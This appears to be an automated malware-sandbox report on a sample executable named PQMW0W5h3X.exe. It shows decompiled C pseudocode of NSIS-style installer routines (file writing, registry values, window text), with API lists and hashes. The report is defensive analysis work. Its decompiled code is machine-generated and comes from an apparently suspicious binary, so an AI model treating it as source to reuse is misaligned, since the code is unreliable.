                                                                                                                          • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                          • String ID: "C:\Users\user\Desktop\PQMW0W5h3X.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 589700163-182453693
                                                                                                                          • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                          • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                                                                                                          • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                                                                                          • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403EBB, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                                          0x00403ecd
                                                                                                                          0x00403f61
                                                                                                                          0x00000000
                                                                                                                          0x00403f61
                                                                                                                          0x00403ede
                                                                                                                          0x00403ee2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00403ee8
                                                                                                                          0x00403ef1
                                                                                                                          0x00403ef4
                                                                                                                          0x00403ef4
                                                                                                                          0x00403efa
                                                                                                                          0x00403f00
                                                                                                                          0x00403f00
                                                                                                                          0x00403f0c
                                                                                                                          0x00403f12
                                                                                                                          0x00403f19
                                                                                                                          0x00403f1c
                                                                                                                          0x00403f1f
                                                                                                                          0x00403f21
                                                                                                                          0x00403f21
                                                                                                                          0x00403f29
                                                                                                                          0x00403f2f
                                                                                                                          0x00403f2f
                                                                                                                          0x00403f39
                                                                                                                          0x00403f3e
                                                                                                                          0x00403f41
                                                                                                                          0x00403f46
                                                                                                                          0x00403f49
                                                                                                                          0x00403f49
                                                                                                                          0x00403f59
                                                                                                                          0x00403f59
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2320649405-0
                                                                                                                          • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                          • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                                                                                                          • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                                          • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 86%
                                                                                                                          			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056F8(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E00405850(_t52);
				_t27 = E0040586F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f54;
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030B3(_t47);
						E00403081(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                                          0x004026af
                                                                                                                          0x004026b1
                                                                                                                          0x004026bd
                                                                                                                          0x004026c0
                                                                                                                          0x004026ca
                                                                                                                          0x004026ce
                                                                                                                          0x004026ce
                                                                                                                          0x004026d4
                                                                                                                          0x004026e1
                                                                                                                          0x004026e9
                                                                                                                          0x004026ec
                                                                                                                          0x004026f2
                                                                                                                          0x00402700
                                                                                                                          0x00402705
                                                                                                                          0x00402709
                                                                                                                          0x0040270c
                                                                                                                          0x00402715
                                                                                                                          0x00402721
                                                                                                                          0x00402725
                                                                                                                          0x00402728
                                                                                                                          0x00402732
                                                                                                                          0x00402751
                                                                                                                          0x00402739
                                                                                                                          0x0040273e
                                                                                                                          0x00402746
                                                                                                                          0x00402749
                                                                                                                          0x0040274e
                                                                                                                          0x0040274e
                                                                                                                          0x00402758
                                                                                                                          0x00402758
                                                                                                                          0x0040276a
                                                                                                                          0x00402771
                                                                                                                          0x00402783
                                                                                                                          0x00402783
                                                                                                                          0x00402789
                                                                                                                          0x00402789
                                                                                                                          0x00402794
                                                                                                                          0x00402795
                                                                                                                          0x00402799
                                                                                                                          0x0040279d
                                                                                                                          0x004027a3
                                                                                                                          0x004027a3
                                                                                                                          0x004027aa
                                                                                                                          0x00402197
                                                                                                                          0x004028c1
                                                                                                                          0x004028cd

                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                                                          • GlobalFree.KERNEL32 ref: 00402758
                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                                                          • GlobalFree.KERNEL32 ref: 00402771
                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3294113728-0
                                                                                                                          • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                                                                                          • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                                                                                                          • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                                                                                                          • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404E84, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404E84(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423724;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423ff4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
					}
					_t26 = lstrlenA(0x41fd10);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd10;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd10)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd10, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                                                          0x00404e8a
                                                                                                                          0x00404e96
                                                                                                                          0x00404e99
                                                                                                                          0x00404e9f
                                                                                                                          0x00404eab
                                                                                                                          0x00404eae
                                                                                                                          0x00404eb1
                                                                                                                          0x00404eb7
                                                                                                                          0x00404eb7
                                                                                                                          0x00404ebd
                                                                                                                          0x00404ec5
                                                                                                                          0x00404ec8
                                                                                                                          0x00404ee5
                                                                                                                          0x00404ee9
                                                                                                                          0x00404ef2
                                                                                                                          0x00404ef2
                                                                                                                          0x00404efc
                                                                                                                          0x00404f05
                                                                                                                          0x00404f11
                                                                                                                          0x00404f18
                                                                                                                          0x00404f1c
                                                                                                                          0x00404f1f
                                                                                                                          0x00404f32
                                                                                                                          0x00404f40
                                                                                                                          0x00404f40
                                                                                                                          0x00404f44
                                                                                                                          0x00404f46
                                                                                                                          0x00404f49
                                                                                                                          0x00000000
                                                                                                                          0x00404f49
                                                                                                                          0x00404eca
                                                                                                                          0x00404ed2
                                                                                                                          0x00404eda
                                                                                                                          0x00404ee0
                                                                                                                          0x00000000
                                                                                                                          0x00404ee0
                                                                                                                          0x00404eda
                                                                                                                          0x00404ec8
                                                                                                                          0x00404f53

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                          • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                          • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                          • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2531174081-0
                                                                                                                          • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                                                                                          • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                                                                                                          • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                                                                                                          • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404753, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404753(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                          0x00404761
                                                                                                                          0x0040476e
                                                                                                                          0x00404774
                                                                                                                          0x004047b2
                                                                                                                          0x004047b2
                                                                                                                          0x004047c1
                                                                                                                          0x004047c8
                                                                                                                          0x00000000
                                                                                                                          0x004047ca
                                                                                                                          0x00404776
                                                                                                                          0x00404785
                                                                                                                          0x0040478d
                                                                                                                          0x00404790
                                                                                                                          0x004047a2
                                                                                                                          0x004047a8
                                                                                                                          0x004047af
                                                                                                                          0x00000000
                                                                                                                          0x004047af
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476E
                                                                                                                          • GetMessagePos.USER32 ref: 00404776
                                                                                                                          • ScreenToClient.USER32 ref: 00404790
                                                                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 004047A2
                                                                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                          • String ID: f
                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                          • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                                          • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                                                                                                          • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                                          • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b0d8; // 0x8600
					_t11 =  *0x41f0e8;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                          0x00402b7b
                                                                                                                          0x00402b89
                                                                                                                          0x00402b8f
                                                                                                                          0x00402b8f
                                                                                                                          0x00402b9d
                                                                                                                          0x00402b9f
                                                                                                                          0x00402ba5
                                                                                                                          0x00402bac
                                                                                                                          0x00402bae
                                                                                                                          0x00402bae
                                                                                                                          0x00402bc4
                                                                                                                          0x00402bd4
                                                                                                                          0x00402be6
                                                                                                                          0x00402be6
                                                                                                                          0x00402bee

                                                                                                                          APIs
                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                                                                          • MulDiv.KERNEL32(00008600,00000064,?), ref: 00402BB4
                                                                                                                          • wsprintfA.USER32 ref: 00402BC4
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                                                                                          • SetDlgItemTextA.USER32 ref: 00402BE6
                                                                                                                          Strings
                                                                                                                          • verifying installer: %d%%, xrefs: 00402BBE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                          • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                                                                                          • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                                                                                                          • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                                                                                          • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 85%
                                                                                                                          			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423ff0 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a410) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a410 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
				return 0;
			}










                                                                                                                          0x00402337
                                                                                                                          0x0040233c
                                                                                                                          0x00402346
                                                                                                                          0x00402350
                                                                                                                          0x00402353
                                                                                                                          0x0040236d
                                                                                                                          0x00402374
                                                                                                                          0x0040237c
                                                                                                                          0x0040238a
                                                                                                                          0x0040238e
                                                                                                                          0x00402399
                                                                                                                          0x00402399
                                                                                                                          0x0040239d
                                                                                                                          0x004023a1
                                                                                                                          0x004023a7
                                                                                                                          0x004023ac
                                                                                                                          0x004023ac
                                                                                                                          0x004023b0
                                                                                                                          0x004023bc
                                                                                                                          0x004023bc
                                                                                                                          0x004023d5
                                                                                                                          0x004023d7
                                                                                                                          0x004023d7
                                                                                                                          0x004023da
                                                                                                                          0x004024b0
                                                                                                                          0x004024b0
                                                                                                                          0x004028c1
                                                                                                                          0x004028cd

                                                                                                                          APIs
                                                                                                                          • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402374
                                                                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsgB979.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402394
                                                                                                                          • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsgB979.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CD
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsgB979.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024B0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsgB979.tmp
                                                                                                                          • API String ID: 1356686001-2253215530
                                                                                                                          • Opcode ID: 5ccfc87406e21083559f7ddac985ae6904c0461a65219700b2570d428c2017e0
                                                                                                                          • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                                                                                                          • Opcode Fuzzy Hash: 5ccfc87406e21083559f7ddac985ae6904c0461a65219700b2570d428c2017e0
                                                                                                                          • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001ADF, Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E10001ADF(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v148;
				void _t46;
				void _t47;
				signed int _t48;
				signed int _t49;
				signed int _t58;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				signed int _t78;
				void* _t82;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				void* _t102;

				_t86 = __edx;
				 *0x10004058 = _a8;
				_t78 = 0;
				 *0x1000405c = _a16;
				_v8 = 0;
				_a16 = E10001561();
				_a8 = E10001561();
				_t91 = E10001641(_a16);
				_t82 = _a8;
				_t88 = _t86;
				_t46 =  *_t82;
				if(_t46 != 0x7e && _t46 != 0x21) {
					_v16 = E10001561();
					_t78 = E10001641(_t75);
					_v8 = _t86;
					GlobalFree(_v16);
					_t82 = _a8;
				}
				_t47 =  *_t82;
				_t102 = _t47 - 0x2f;
				if(_t102 > 0) {
					_t48 = _t47 - 0x3c;
					__eflags = _t48;
					if(_t48 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x3c;
						if( *((char*)(_t82 + 1)) != 0x3c) {
							__eflags = _t88 - _v8;
							if(__eflags > 0) {
								L54:
								_t49 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t91 = _t49;
								_t88 = _t86;
								L57:
								E1000176C(_t86, _t91, _t88,  &_v148);
								E1000159E( &_v148);
								GlobalFree(_a16);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t49 = 1;
								goto L55;
							}
							__eflags = _t91 - _t78;
							if(_t91 < _t78) {
								goto L47;
							}
							goto L54;
						}
						_t86 = _t88;
						_t49 = E10002BD0(_t91, _t78, _t86);
